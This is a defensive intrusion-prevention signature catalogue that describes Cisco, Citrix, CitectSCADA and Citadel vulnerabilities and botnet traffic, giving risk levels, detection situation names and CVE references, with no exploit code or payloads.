A vulnerability in Cisco Secure ACS which allows remote attackers to bypass authentication by sending an invalid but cryptographically correct certificate, due to the way certificate validation is handled when the authentication method used is EAP-TLS.

Situation:

Generic_UDP-Cisco-Secure-ACS-EAP-TLS-Authentication-Bypass-Vulnerability

References:

CVE-2004-1099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1099

Cisco-Secure-ACS-Unauthorized-Password-Change

About this vulnerability:

A Cisco Secure ACS Unauthorized Password Change vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-740-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Cisco

Software:

Cisco Secure ACS

Type:

Configuration Error

Description:

A vulnerability in Cisco Secure ACS, versions 5.1 before 5.1.0.44.6 and 5.2 before 5.2.0.26.3, which does not properly restrict access to the password-change feature, allowing remote attackers to change arbitrary user passwords.

Situation:

HTTP_CRL-Cisco-Secure-ACS-Unauthorized-Password-Change

References:

CVE-2011-0951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0951

BID-47093
http://www.securityfocus.com/bid/47093

Cisco-Secure-ACS-Web-Management-Interface-Buffer-Overflow

About this vulnerability:

Cisco Secure ACS Web Management Interface Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-631-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Cisco Secure ACS

Type:

Malfunction

Description:

There exists a buffer overflow vulnerability in Cisco Secure Access Control Server WEB interface.

Situation:

HTTP_CRL-Cisco-Secure-ACS-Web-Management-Interface-Buffer-Overflow

References:

CVE-2003-0210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0210

Cisco-Secure-Desktop-CSDwebinstaller-Code-Execution

About this vulnerability:

A vulnerability in Cisco Systems Secure Desktop

Risk:

Moderate

First detected in:

sgpkg-ips-385-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Cisco Secure Desktop

Type:

Malfunction

Description:

A remote code execution vulnerability exists in Cisco Secure Desktop. The vulnerability is due to a lack of validation of executables downloaded by the Secure Desktop Web CSDWebInstaller.ocx ActiveX control. Specifically, the hash in the executable's digital signature is not verified against the executable's content. This vulnerability may be exploited by remote attackers to execute arbitrary code on the affected system by enticing a user to visit a malicious web page. In attack scenarios where code execution is successful, the behaviour of the target machine is dependent entirely on the intention of the injected code, which will run within the security context of the currently logged in user.

Situation:

HTTP_SS-Cisco-Secure-Desktop-CSDwebinstaller-Code-Execution
File-Text_Cisco-Secure-Desktop-CSDwebinstaller-Code-Execution

References:

CVE-2011-0926
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0926

BID-46536
http://www.securityfocus.com/bid/46536

Cisco-Security-Agent-Management-Center-Code-Execution

About this vulnerability:

A vulnerability in Cisco Systems Security Agent Management Center

Risk:

High

First detected in:

sgpkg-ips-383-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Security Agent Management Center

Type:

Malfunction

Description:

An arbitrary file upload vulnerability exists in the Manager Center for Cisco Security Agent.

Situation:

HTTP_CS-Cisco-Security-Agent-Management-Center-Code-Execution
HTTPS_SS-Cisco-Security-Agent-Management-Center-Code-Execution

References:

CVE-2011-0364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0364

BID-46420
http://www.securityfocus.com/bid/46420

Cisco-Security-Manager-Authtokenservlet-Insecure-Deserialization

About this vulnerability:

A vulnerability in Cisco Systems Cisco Security Manager (CSM)

Risk:

High

First detected in:

sgpkg-ips-1313-5242

Last changed:

sgpkg-ips-1313-5242

Platform:

Generic

Software:

Cisco Systems Cisco Security Manager (CSM)

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in Cisco Security Manager. The vulnerability is due to insufficient validation of request to AuthTokenServlet. A remote, unauthenticated user can exploit this vulnerability by sending malicious request to the target server. Successful exploitation can result in arbitrary code execution under the security context of the affected server.

Situation:

HTTP_CRL-Cisco-Security-Manager-Authtokenservlet-Insecure-Deserialization

References:

CVE-2020-27131
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27131

Cisco-Security-Manager-Ctmservlet-Insecure-Deserialization

About this vulnerability:

A vulnerability in Cisco Systems Cisco Security Manager (CSM)

Risk:

High

First detected in:

sgpkg-ips-1308-5242

Last changed:

sgpkg-ips-1308-5242

Platform:

Generic

Software:

Cisco Systems Cisco Security Manager (CSM)

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in Cisco Security Manager. The vulnerability is due to insufficient validation of request to CTMServlet. A remote, unauthenticated user can exploit this vulnerability by sending malicious request to the target server. Successful exploitation can result in result in arbitrary code execution under the security context of the affected server.

Situation:

HTTP_CRL-Cisco-Security-Manager-Ctmservlet-Insecure-Deserialization

References:

CVE-2020-27131
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27131

Cisco-Security-Manager-Rmi-Insecure-Deserialization

About this vulnerability:

A vulnerability in Cisco Systems Cisco Security Manager (CSM)

Risk:

Moderate

First detected in:

sgpkg-ips-1200-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Cisco Security Manager (CSM)

Type:

Input Validation

Description:

There exists a pre-auth insecure deserialization vulnerability in Cisco Security Manager. Successful exploitation could lead in arbitrary code execution.

Situation:

Generic_CS-Cisco-Security-Manager-Rmi-Insecure-Deserialization

References:

CVE-2019-12630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12630

Cisco-Security-Manager-Secretservice.jsp-Insecure-Deserialization

About this vulnerability:

A vulnerability in Cisco Systems Cisco Security Manager (CSM)

Risk:

High

First detected in:

sgpkg-ips-1303-5242

Last changed:

sgpkg-ips-1303-5242

Platform:

Generic

Software:

Cisco Systems Cisco Security Manager (CSM)

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in Cisco Security Manager. The vulnerability is due to insufficient validation of request to SecretService.jsp. A remote, unauthenticated user can exploit this vulnerability by sending malicious request to the target server. Successful exploitation can result in result in arbitrary code execution under the security context of the affected server.

Situation:

HTTP_CRL-Cisco-Security-Manager-Secretservice.jsp-Insecure-Deserialization

References:

CVE-2020-27131
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27131

Cisco-Small-Business-RV-Series-Authentication-Bypass-And-Command-Injection

About this vulnerability:

A vulnerability in Cisco Small Business RV series of VPN/routers.

Risk:

High

First detected in:

sgpkg-ips-1436-5242

Last changed:

sgpkg-ips-1436-5242

Platform:

Generic

Software:

Cisco Small Business RV VPN/Routers

Type:

Input Validation

Description:

A vulnerability in Cisco Small Business RV series of VPN/routers, modules RV340, RV340w, RV345, and RV345P using firmware versions 1.0.03.20 and below, which allows remote attackers to bypass authentication (CVE-2021-1472) and execute arbitrary commands (CVE-2021-1473) by sending a crafted sessionid in a Cookie header.

Situation:

HTTP_CSH-Cisco-Small-Business-RV-Series-Authentication-Bypass-And-Command-Injection

References:

CVE-2021-1473
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1473

Cisco-Smart-Licensing-Utility-Static-Administrative-Credentials-CVE-2024-20439

About this vulnerability:

A vulnerability in Cisco Smart Licensing Utility

Risk:

High

First detected in:

sgpkg-ips-1865-5242

Last changed:

sgpkg-ips-1865-5242

Platform:

Generic

Software:

Cisco Smart Licensing Utility

Type:

Backdoor

Description:

Cisco Smart Licensing Utility contains undocumented but publicly known credentials with administrative access.

Situation:

HTTP_CSH-Cisco-Smart-Licensing-Utility-Static-Administrative-Credentials-CVE-2024-20439

References:

CVE-2024-20439
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20439

Cisco-Systempreferences_configurable-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Cisco Systems Evolved Programmable Network Manager

Risk:

High

First detected in:

sgpkg-ips-949-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Evolved Programmable Network Manager; Cisco Systems Prime Infrastructure

Type:

Input Validation

Description:

There exists a cross-site scripting vulnerability in Cisco Prime Infrastructure and Evolved Programmable Network Manager. A remote attacker can use this to execute arbitrary scripts on the target user's browser.

Situation:

HTTP_CSU-Cisco-Prime-Infrastructure-And-Epnm-Systempreferences_configurable-Request
HTTP_CRL-Cisco-Prime-Infrastructure-And-Epnm-Systempreferences_configurable-Cross-Site-Scripting

References:

CVE-2017-6699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6699

Cisco-TelePresence-HTML-Injection-And-Memory-Corruption-Vulnerabilities

About this vulnerability:

A vulnerability in Cisco TelePresence

Risk:

Moderate

First detected in:

sgpkg-ips-580-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco TelePresence

Type:

Input Validation

Description:

There is a cross-site scripting (XSS) vulnerability in the web interface in Cisco TelePresence System MXP Series F9.1 and earlier which allows remote authenticated users to inject arbitrary web script or HTML via certain SIP headers.

Situation:

SIP-TCP_Cisco-TelePresence-HTML-Injection-And-Memory-Corruption-Vulnerabilities
SIP-UDP_Cisco-TelePresence-HTML-Injection-And-Memory-Corruption-Vulnerabilities

References:

CVE-2011-2543
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2543

BID-49670
http://www.securityfocus.com/bid/49670

Cisco-UCS-Director-Amf-External-Entity-Injection

About this vulnerability:	A vulnerability in Cisco Systems UCS Director
Risk:	High
First detected in:	sgpkg-ips-1385-5242
Last changed:	sgpkg-ips-1385-5242
Platform:	Generic
Software:	Cisco UCS Director
Type:	Input Validation
Description:	An XML External Entity Injection vulnerability has been reported in Cisco UCS Directory. The vulnerability is due to insufficient validation of user input sent to the amf endpoint A remote, unauthenticated attacker could exploit this vulnerability by sending malicious XML data in HTTP requests to the target server. Successful exploitation could result in the disclosure of information in the context of the ucsdu user.
Situation:	HTTP_CS-Cisco-UCS-Director-Amf-External-Entity-Injection

Cisco-UCS-Director-Copyfilerunnable-Run-Symlink-Remote-Code-Execution

About this vulnerability:

A vulnerability in Cisco UCS Director

Risk:

Moderate

First detected in:

sgpkg-ips-1267-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco UCS Director

Type:

Input Validation

Description:

Improper input validation causes a remote code execution vulnerability in Cisco UCS Director. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

File-Binary_Cisco-UCS-Director-Copyfilerunnable-Run-Symlink-Remote-Code-Execution

References:

CVE-2020-3247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3247

Cisco-UCS-Director-Downloadfile-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Systems UCS Director

Risk:

Moderate

First detected in:

sgpkg-ips-1246-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco UCS Director

Type:

Directory Traversal

Description:

There has been reported a directory traversal vulnerability in Cisco UCS Director. Successful exploitation could lead in information disclosure.

Situation:

HTTP_CRL-Cisco-UCS-Director-Downloadfile-Directory-Traversal

References:

CVE-2020-3250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3250

Cisco-UCS-Director-Isenablerestkeyaccesscheckforuser-Auth-Bypass-Vulnerability

About this vulnerability:

A vulnerability in Cisco Systems UCS Director

Risk:

Moderate

First detected in:

sgpkg-ips-1248-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco UCS Director

Type:

Input Validation

Description:

Insufficient validation of request contents causes an authentication bypass vulnerability in Cisco UCS Director. A successful exploit may allow an attacker to bypass authentication.

Situation:

HTTP_CS-Cisco-UCS-Director-Isenablerestkeyaccesscheckforuser-Authentication-Bypass-Vulnerability

References:

CVE-2020-3243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3243

Cisco-UCS-Director-Mycallable-Call-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Systems UCS Director

Risk:

Moderate

First detected in:

sgpkg-ips-1252-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco UCS Director

Type:

Directory Traversal

Description:

Insufficient validation of file paths in HTTP requests causes a director traversal vulnerability in Cisco UCS Director. A successful attack may allow an attacker to write files to arbitrary and potentially executable locations on the target system.

Situation:

HTTP_CS-Cisco-UCS-Director-Mycallable-Call-Directory-Traversal

References:

CVE-2020-3251
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3251

Cisco-UCS-Director-Savestaticconfig-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Systems UCS Director

Risk:

Moderate

First detected in:

sgpkg-ips-1272-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco UCS Director; Cisco UCS Director Express for Big Data

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Cisco UCS Directory. The vulnerability is due to insufficient validation of user input in the saveStaticConfig method. A remote authenticated attacker can exploit the vulnerability by sending malicious requests to the target server. Successful exploitation could result in arbitrary file write and, in the worst case, remote code execution under the security context of web server.

Situation:

HTTP_CRL-Cisco-UCS-Director-Savestaticconfig-Directory-Traversal

References:

CVE-2020-3248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3248

Cisco-UCS-Director-Savewindowsnetworkconfig-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Systems UCS Director

Risk:

Moderate

First detected in:

sgpkg-ips-1271-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco UCS Director

Type:

Directory Traversal

Description:

There exists a directory traversal vulnerability in Cisco UCS Director. Successful exploitation could lead in denial of service conditions.

Situation:

HTTP_CRL-Cisco-UCS-Director-Savewindowsnetworkconfig-Directory-Traversal

References:

CVE-2020-3249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3249

Cisco-UCS-Director-Scriptmoduleaddjarpage-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Systems UCS Director

Risk:

Moderate

First detected in:

sgpkg-ips-1270-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco UCS Director

Type:

Directory Traversal

Description:

Improper validation of inputs to the ScriptModuleAddJarPage method causes a directory traversal vulnerability in Cisco UCS director. A successful exploit allows an attacker to write arbitrary files on the target system.

Situation:

HTTP_CRL-Cisco-UCS-Director-Scriptmoduleaddjarpage-Directory-Traversal

References:

CVE-2020-3240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3240

Cisco-UCS-Director-Unauthenticated-RCE

About this vulnerability:

A vulnerability in Cisco UCS Director

Risk:

High

First detected in:

sgpkg-ips-1194-5242

Last changed:

sgpkg-ips-1614-5242

Platform:

Generic

Software:

Cisco UCS Director

Type:

Input Validation

Description:

A vulnerability in Cisco UCS Director virtual appliance, versions 6.6.0 and 6.7.0, which allows remote attackers to execute arbitrary code by bypassing authentication, CVE-2019-1937, and injecting code in a password change form CVE-2019-1936.

Situation:

HTTP_CS-Cisco-UCS-Director-Unauthenticated-RCE
HTTP_CRL-Cisco-UCS-Director-Unauthenticated-RCE

References:

CVE-2019-1936
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1936

Cisco-Unified-Communications-Manager-Multiple-SQL-Injections

About this vulnerability:

An attempt to exploit SQL injection vulnerability in Cisco Unified Communications Manager

Risk:

High

First detected in:

sgpkg-ips-391-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Unified Communications Manager

Type:

SQL Injection

Description:

Multiple SQL injection vulnerabilities exist within Cisco Unified Communications Manager. These vulnerabilities could be exploited by remote attackers to conduct SQL injection attacks on the server.

Situation:

HTTP_CRL-Cisco-Unified-Communications-Manager-Multiple-SQL-Injections

References:

CVE-2011-1610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1610

BID-47607
http://www.securityfocus.com/bid/47607

Cisco-Unified-Contact-Center-Express-Rmi-Insecure-Deserialization

About this vulnerability:

A vulnerability in Cisco Systems Unified Contact Center Express (UCCX)

Risk:

High

First detected in:

sgpkg-ips-1260-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Unified Contact Center Express (UCCX)

Type:

Input Validation

Description:

An insecure deserialization vulnerability exists in Cisco Unified Contact Center Express. This vulnerability is due to deserialization of untrusted data. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted serialized object. Successful exploitation can result in arbitrary code execution as the root user.

Situation:

Generic_CS-Cisco-Unified-Contact-Center-Express-Rmi-Insecure-Deserialization

References:

CVE-2020-3280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3280

Cisco-Webex-Magic-Url-Remote-Command-Execution

About this vulnerability:

A vulnerable WebEx Extension

Risk:

High

First detected in:

sgpkg-ips-845-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Cisco Webex Player

Type:

Code Injection

Description:

Cisco's WebEx extension jlhmfgmfgeifomenelglieieghnjghma has a vulnerability that allows a remote attacker to execute arbitrary code on the affected system.

Situation:

HTTP_CSU-Cisco-Webex-Magic-Url-Remote-Command-Execution
File-Text_Cisco-Webex-Magic-Url-Remote-Command-Execution

References:

CVE-2017-3823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3823

Cisco-Webex-Meeting-Manager-atucfobj-ActiveX-Control-BOF

About this vulnerability:

Buffer overflow vulnerability in Cisco Webex Meeting Manager

Risk:

High

First detected in:

sgpkg-ips-166-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Cisco Webex Meeting Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Cisco Webex Meeting Manager. A remote attacker can exploit the vulnerability by enticing a user to visit a web page that contains malicious usage of the vulnerable WebexUCFObject ActiveX control. A successful exploit allows arbitrary code execution with the privileges of the currently logged in user.

Situation:

HTTP_SS-Cisco-Webex-Meeting-Manager-atucfobj-ActiveX-Control-BOF
File-Text_Cisco-Webex-Meeting-Manager-atucfobj-ActiveX-Control-BOF

References:

CVE-2008-3558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3558

BID-30578
http://www.securityfocus.com/bid/30578

OSVDB-47344
http://www.osvdb.org/47344

Cisco-Webex-Player-.wrf-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Cisco Systems WebEx Player

Risk:

Moderate

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Webex Player

Type:

Buffer Overflow

Description:

A stack buffer overflow exists in Cisco WebEx Player. The vulnerability is due to improper handling of specially crafted .wrf files which results in a stack buffer overflow that can overwrite a function pointer to create reliable code execution. To exploit this vulnerability an attacker must entice a user to open a specially crafted .wrf file. Successful exploitation will result in arbitrary code execution in the context of the application.

Situation:

File-Binary_Cisco-Webex-Player-BOF

References:

CVE-2010-3269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3269

BID-46075
http://www.securityfocus.com/bid/46075

Cisco-Webex-Player-Atas32.dll-Remote-Code-Execution

About this vulnerability:

A vulnerability in Cisco Systems WebEx Player

Risk:

Moderate

First detected in:

sgpkg-ips-427-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Webex Player

Type:

Malfunction

Description:

There is a code execution vulnerability in Cisco WebEx Player. The vulnerability is found in ATAS32.DLL and is due to insufficient validation of some values in record Type 0x1F and Type 0xBB while processing WebEx Recording Format (WRF) files. The code uses these values in determining the source, size and the destination pointer of a memcpy(). A remote unauthenticated attacker can leverage this vulnerability by crafting records of Type 0x1F and Type 0xBB in a WRF file and enticing the target users to view the malicious file. Successful exploitation would result in execution of arbitrary code on the target host in the context of the application.

Situation:

File-Binary_Cisco-Webex-Player-Atas32.dll-Remote-Code-Execution

References:

CVE-2011-4004
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4004

OSVDB-76571
http://www.osvdb.org/76571

Cisco-Webex-Recording-Format-Player-Atas32.dll-Integer-Overflow

About this vulnerability:

A vulnerability in Cisco Systems WebEx Player

Risk:

Moderate

First detected in:

sgpkg-ips-454-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Webex Player

Type:

Integer Overflow

Description:

There is a code execution vulnerability in Cisco WebEx Recording Format (WRF) Player. This vulnerability is due to an integer overflow leading to a heap buffer overflow when processing WRF files. A remote unauthenticated attacker can leverage this vulnerability by crafting a WRF file and enticing the target user to view the malicious file. Successful exploitation would result in execution of arbitrary code on the target host in the context of the currently logged on user.

Situation:

File-Binary_Cisco-Webex-Recording-Format-Player-Atas32.dll-Integer-Overflow

References:

CVE-2012-1336
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1336

OSVDB-81105
http://www.osvdb.org/81105

Cisco-Webex-Recording-Format-Player-Atas32.dll-Memory-Corruption

About this vulnerability:

A vulnerability in Cisco Systems WebEx Player

Risk:

Moderate

First detected in:

sgpkg-ips-499-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Webex Player

Type:

Malfunction

Description:

A code execution vulnerability exists in Cisco WebEx Recording Format (WRF) Player. This vulnerability is due to a write-what-where memory corruption when the WRF player handles WRF files. A remote, unauthenticated attacker can leverage this vulnerability by crafting a WRF file and enticing a target user to view the malicious file. Successful exploitation would result in execution of arbitrary code on the target host in the context of the application.

Situation:

File-Binary_Cisco-Webex-Recording-Format-Player-Atas32.dll-Memory-Corruption

References:

CVE-2012-3939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3939

BID-55866
http://www.securityfocus.com/bid/55866

OSVDB-86138
http://www.osvdb.org/86138

Cisco-Webex-Recording-Format-Player-Atas32.dll-Subrecords-Integer-Overflow

About this vulnerability:

An attempt to exploit a vulnerability in Cisco Systems WebEx Player detected

Risk:

Moderate

First detected in:

sgpkg-ips-972-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Webex Player

Type:

Integer Overflow

Description:

There is a integer overflow vulnerability in Cisco WebEx Recording Format yPlayer due to improper bounds checking, which allows remote attackers to execute arbitrary code via a crafted WRF file.

Situation:

File-Binary_Cisco-Webex-Recording-Format-Player-Atas32.dll-Subrecords-Integer-Overflow

References:

CVE-2012-1337
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1337

OSVDB-81106
http://www.osvdb.org/81106

Cisco-Webex-Recording-Format-Player-Atdl2006.dll-Buffer-Overflow

About this vulnerability:

A vulnerability in Cisco Systems WebEx Player

Risk:

Moderate

First detected in:

sgpkg-ips-973-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Webex Player

Type:

Buffer Overflow

Description:

There exists a code execution vulnerability in Cisco WebEx Recording Format Player.

Situation:

File-Binary_Cisco-Webex-Recording-Format-Player-Atdl2006.dll-Buffer-Overflow

References:

CVE-2012-1335
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1335

OSVDB-81104
http://www.osvdb.org/81104

Cisco-Webex-Recording-Format-Player-Atdl2006.dll-Integer-Overflow

About this vulnerability:	A vulnerability in Cisco Systems WebEx Player
Risk:	Moderate
First detected in:	sgpkg-ips-455-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Cisco Webex Player
Type:	Integer Overflow
Description:	There is a code execution vulnerability in Cisco's WebEx Recording Format (WRF) Player. This vulnerability is due to an integer overflow leading to a buffer overflow when the WRF player handles WRF files. A remote unauthenticated attacker can leverage this vulnerability by crafting a WRF file and enticing the target users to view the malicious file. Successful exploitation would result in execution of arbitrary code on the target host in the context of the application.
Situation:	File-Binary_Cisco-Webex-Recording-Format-Player-Atdl2006.dll-Integer-Overflow

Cisco-Webex-Teams-URI-Handler-Remote-Code-Execution

About this vulnerability:

A vulnerability in Cisco Webex Teams

Risk:

Moderate

First detected in:

sgpkg-ips-1158-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Webex Teams

Type:

Input Validation

Description:

Improper sanitization of user-supplied data in a DLL loading path option causes a vulnerability in Cisco Webex Teams. A successful attack allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_SHS-Cisco-Webex-Teams-URI-Handler-Remote-Code-Execution
File-Text_Cisco-Webex-Teams-URI-Handler-Remote-Code-Execution

References:

CVE-2019-1636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1636

Cisco-Wireless-IP-Phone-Stack-Based-Buffer-Overflow

About this vulnerability:

An attempt to exploit a vulnerability in Cisco Wireless IP Phone detected

Risk:

High

First detected in:

sgpkg-ips-1406-5242

Last changed:

sgpkg-ips-1406-5242

Platform:

Generic

Software:

Cisco IP Phone

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Cisco Wireless IP Phone detected.

Situation:

HTTP_CSU-Cisco-Wireless-IP-Phone-Stack-Based-Buffer-Overflow

References:

CVE-2020-3161
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3161

Citadel-Botnet

About this vulnerability:	Citadel botnet
Risk:	High
First detected in:	sgpkg-ips-751-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Code Injection
Description:	Citadel is a malicious botnet which poses a serious threat to Internet users. Most notably, Citadel engages in trojan activity as an information stealer and a tool to commit banking fraud. In addition, it may download further malicious modules. Users of infected computers are advised to disinfect their computers and change passwords for online banking and other online services immediately.
Situation:	HTTP_SHS-Citadel-Botnet-Traffic

Citadel_UX-Lprintf-Function-Format-String

About this vulnerability:

Format string vulnerability in the lprintf function in Citadel/UX

Risk:

High

First detected in:

sgpkg-ips-18-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Citadel

Type:

Format String

Description:

Citadel/UX Bulletin Board Service (BBS) program is vulnerable to a format string attack due to the failure of properly sanitising user-supplied input passed to the lprintf function. A remote attacker could exploit this vulnerability to gain root access on the system.

Situation:

Generic_Citadel-UX-Lprintf-Function-Format-String

References:

CVE-2004-1192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1192

BID-11885
http://www.securityfocus.com/bid/11885

OSVDB-12344
http://www.osvdb.org/12344

CitectSCADA-ODBC-Service-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in CitectSCADA

Risk:

High

First detected in:

sgpkg-ips-168-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

CitectSCADA; CitectFacilities

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in CitectSCADA. The vulnerability is caused by insufficient input validation in the ODBC interface of the product. A successful attacker may execute arbitrary code in the context of the ODBC service.

Situation:

Generic_CS-CitectSCADA-ODBC-Service-Buffer-Overflow

References:

CVE-2008-2639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2639

BID-29634
http://www.securityfocus.com/bid/29634

Citrix-Access-Gateway-Command-Execution

About this vulnerability:

A Citrix Access Gateway Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-716-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Citrix Access Gateway

Type:

Input Validation

Description:

A vulnerability in Citrix Access Gateway, versions 9.2-49.8 and before, which allows remote attackers to execute arbitrary commands via shell metacharacters in the password field.

Situation:

HTTP_CRL-Citrix-Access-Gateway-Command-Execution

References:

CVE-2010-4566
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4566

BID-45402
http://www.securityfocus.com/bid/45402

OSVDB-70099
http://www.osvdb.org/70099

Citrix-Access-Gateway-Plug-In-For-Windows-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in Citrix Systems Access Gateway Plug-in for Windows

Risk:

Moderate

First detected in:

sgpkg-ips-467-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Citrix Systems Access Gateway Plug-in for Windows

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in Citrix Access Gateway Plug-in for Windows. The vulnerability is due to insufficient validation of the "CSEC" header field in the HTTP responses to the requests sent by the StartEpa() method. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to access a maliciously crafted web page. This can result in code execution in the context of the current logged in user.

Situation:

HTTP_SHS-Citrix-Access-Gateway-Plug-In-For-Windows-ActiveX-Control-BOF

References:

CVE-2011-2592
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2592

BID-54754
http://www.securityfocus.com/bid/54754

OSVDB-84433
http://www.osvdb.org/84433

Citrix-Application-Delivery-Controller-And-Gateway-Information-Disclosure

About this vulnerability:

A vulnerability in Citrix Systems ADC and Citrix Gateway

Risk:

Moderate

First detected in:

sgpkg-ips-1270-5242

Last changed:

sgpkg-ips-1408-5242

Platform:

Generic

Software:

Citrix Application Delivery Controller; Citrix Gateway

Type:

Malfunction

Description:

There exists an information disclosure vulnerability in Citrix Application Delivery Controller and Gateway. Succesful exploitation could lead in sensitive information disclosure. This situation also covers the vulnerability CVE-2020-8196.

Situation:

HTTP_CSU-Citrix-Application-Delivery-Controller-And-Gateway-Information-Disclosure

References:

CVE-2020-8195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8195

Citrix-Authorization-Bypass-CVE-2020-8193

About this vulnerability:

Authorization bypass vulnerability in Citrix

Risk:

High

First detected in:

sgpkg-ips-1262-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Citrix Application Delivery Controller;Citrix Gateway;Citrix SDWAN WANOP

Type:

Malfunction

Description:

There exists an authorization bypass vulnerability in Citrix. Successful exploitation of this issue can result in unauthorized access to restricted files.

Situation:

HTTP_CRL-Citrix-Authorization-Bypass-CVE-2020-8193
HTTP_CRL-Citrix-Forced-New-nsroot-Session
HTTP_CHS-Citrix-Authorization-Bypass-CVE-2020-8193

References:

CVE-2020-8193
